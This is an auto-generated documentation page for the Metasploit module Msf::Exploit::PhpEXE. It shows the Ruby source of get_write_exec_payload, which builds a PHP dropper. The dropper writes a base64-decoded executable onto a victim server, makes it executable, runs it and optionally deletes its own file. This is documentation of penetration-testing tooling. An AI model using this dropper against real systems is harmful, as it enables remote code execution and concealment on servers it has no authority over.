adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/PhpEXE.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

389 lines
18 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::PhpEXE
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::PhpEXE";
relpath = '../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../_index.html">Index (P)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span>
&raquo;
<span class="title">PhpEXE</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::PhpEXE
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="EXE.html" title="Msf::Exploit::EXE (module)">EXE</a></span>, <span class='object_link'><a href="../Payload/Php.html" title="Msf::Payload::Php (module)">Payload::Php</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/php_exe.rb</dd>
</dl>
</div>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#get_write_exec_payload-instance_method" title="#get_write_exec_payload (instance method)">#<strong>get_write_exec_payload</strong>(opts = {}) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate a first-stage php payload.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Payload/Php.html" title="Msf::Payload::Php (module)">Payload::Php</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Payload/Php.html#create_exec_stub-class_method" title="Msf::Payload::Php.create_exec_stub (method)">create_exec_stub</a></span>, <span class='object_link'><a href="../Payload/Php.html#php_create_exec_stub-instance_method" title="Msf::Payload::Php#php_create_exec_stub (method)">#php_create_exec_stub</a></span>, <span class='object_link'><a href="../Payload/Php.html#php_exec_cmd-instance_method" title="Msf::Payload::Php#php_exec_cmd (method)">#php_exec_cmd</a></span>, <span class='object_link'><a href="../Payload/Php.html#php_preamble-instance_method" title="Msf::Payload::Php#php_preamble (method)">#php_preamble</a></span>, <span class='object_link'><a href="../Payload/Php.html#php_system_block-instance_method" title="Msf::Payload::Php#php_system_block (method)">#php_system_block</a></span>, <span class='object_link'><a href="../Payload/Php.html#preamble-class_method" title="Msf::Payload::Php.preamble (method)">preamble</a></span>, <span class='object_link'><a href="../Payload/Php.html#system_block-class_method" title="Msf::Payload::Php.system_block (method)">system_block</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="EXE.html" title="Msf::Exploit::EXE (module)">EXE</a></span></h3>
<p class="inherited"><span class='object_link'><a href="EXE.html#exe_init_options-instance_method" title="Msf::Exploit::EXE#exe_init_options (method)">#exe_init_options</a></span>, <span class='object_link'><a href="EXE.html#exe_post_generation-instance_method" title="Msf::Exploit::EXE#exe_post_generation (method)">#exe_post_generation</a></span>, <span class='object_link'><a href="EXE.html#generate_payload_dccw_gdiplus_dll-instance_method" title="Msf::Exploit::EXE#generate_payload_dccw_gdiplus_dll (method)">#generate_payload_dccw_gdiplus_dll</a></span>, <span class='object_link'><a href="EXE.html#generate_payload_dll-instance_method" title="Msf::Exploit::EXE#generate_payload_dll (method)">#generate_payload_dll</a></span>, <span class='object_link'><a href="EXE.html#generate_payload_exe-instance_method" title="Msf::Exploit::EXE#generate_payload_exe (method)">#generate_payload_exe</a></span>, <span class='object_link'><a href="EXE.html#generate_payload_exe_service-instance_method" title="Msf::Exploit::EXE#generate_payload_exe_service (method)">#generate_payload_exe_service</a></span>, <span class='object_link'><a href="EXE.html#generate_payload_msi-instance_method" title="Msf::Exploit::EXE#generate_payload_msi (method)">#generate_payload_msi</a></span>, <span class='object_link'><a href="EXE.html#get_custom_exe-instance_method" title="Msf::Exploit::EXE#get_custom_exe (method)">#get_custom_exe</a></span>, <span class='object_link'><a href="EXE.html#get_eicar_exe-instance_method" title="Msf::Exploit::EXE#get_eicar_exe (method)">#get_eicar_exe</a></span>, <span class='object_link'><a href="EXE.html#initialize-instance_method" title="Msf::Exploit::EXE#initialize (method)">#initialize</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="get_write_exec_payload-instance_method">
#<strong>get_write_exec_payload</strong>(opts = {}) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<div class="note todo">
<strong>TODO:</strong>
<div class='inline'>
<p>Test on Windows</p>
</div>
</div>
<p>Generate a first-stage php payload.</p>
<p>For ARCH_PHP targets, simply returns payload.encoded wrapped in &lt;?php ?&gt; markers.</p>
<p>For target architectures other than ARCH_PHP, this will base64 encode an appropriate executable and drop it on the target system. After running it, the generated code will attempt to unlink the dropped executable which will certainly fail on Windows.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>a customizable set of options</p>
</div>
</li>
</ul>
<p class="tag_title">Options Hash (<tt>opts</tt>):</p>
<ul class="option">
<li>
<span class="name">:writable_path</span>
<span class="type">(<tt>String</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>A path on the victim where we can write an executable. Uses current directory if not given.</p>
</div>
</li>
<li>
<span class="name">:unlink_self</span>
<span class="type">(<tt>Boolean</tt>)</span>
<span class="default">
</span>
&mdash; <div class='inline'>
<p>Whether to call unlink(__FILE__); in the payload. Good idea for arbitrary-file-upload vulns, bad idea for write-to-a-config-file vulns</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>A PHP payload that will drop an executable for non-php target architectures</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/php_exe.rb', line 36</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_write_exec_payload'>get_write_exec_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_opts'>opts</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_target_arch'>target_arch</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span>
<span class='kw'>when</span> <span class='const'>ARCH_PHP</span>
<span class='id identifier rubyid_php'>php</span> <span class='op'>=</span> <span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded'>encoded</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_bin_name'>bin_name</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:writable_path</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_bin_name'>bin_name</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:writable_path</span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_bin_name'>bin_name</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_join'><span class='object_link'><a href="../../top-level-namespace.html#join-instance_method" title="#join (method)">join</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>/</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_bin_name'>bin_name</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>./</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bin_name'>bin_name</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Platform</span><span class='tstring_end'>&quot;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>win</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_bin_name'>bin_name</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to clean up </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bin_name'>bin_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>, delete it manually</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_p'>p</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_generate_payload_exe'>generate_payload_exe</span><span class='rparen'>)</span>
<span class='id identifier rubyid_vars'>vars</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>RandomIdentifier</span><span class='op'>::</span><span class='const'>Generator</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='label'>language:</span> <span class='symbol'>:php</span><span class='rparen'>)</span>
<span class='id identifier rubyid_php'>php</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>%Q{</span><span class='tstring_content'>
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_php_preamble'>php_preamble</span><span class='lparen'>(</span><span class='label'>vars_generator:</span> <span class='id identifier rubyid_vars'>vars</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>
$ex = &quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_bin_name'>bin_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
$f = fopen($ex, &quot;wb&quot;);
fwrite($f, base64_decode(&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_p'>p</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;));
fclose($f);
chmod($ex, 0777);
function my_cmd($cmd) {
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_php_system_block'>php_system_block</span><span class='lparen'>(</span><span class='label'>vars_generator:</span> <span class='id identifier rubyid_vars'>vars</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>;
}
if (FALSE === strpos(strtolower(PHP_OS), &#39;win&#39; )) {
my_cmd($ex . &quot;&amp;&quot;);
} else {
my_cmd($ex);
}
unlink($ex);
</span><span class='tstring_end'>}</span></span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='symbol'>:unlink_self</span><span class='rbracket'>]</span>
<span class='comment'># Prepend instead of appending to make sure it happens no matter
</span> <span class='comment'># what the payload normally does.
</span> <span class='id identifier rubyid_php'>php</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>@unlink(__FILE__);</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_php'>php</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_php'>php</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>#.*$</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_php'>php</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>[\t ]+</span><span class='regexp_end'>/</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_php'>php</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\n</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> </span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;?php </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_php'>php</span><span class='embexpr_end'>}</span><span class='tstring_content'> ?&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:01:11 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink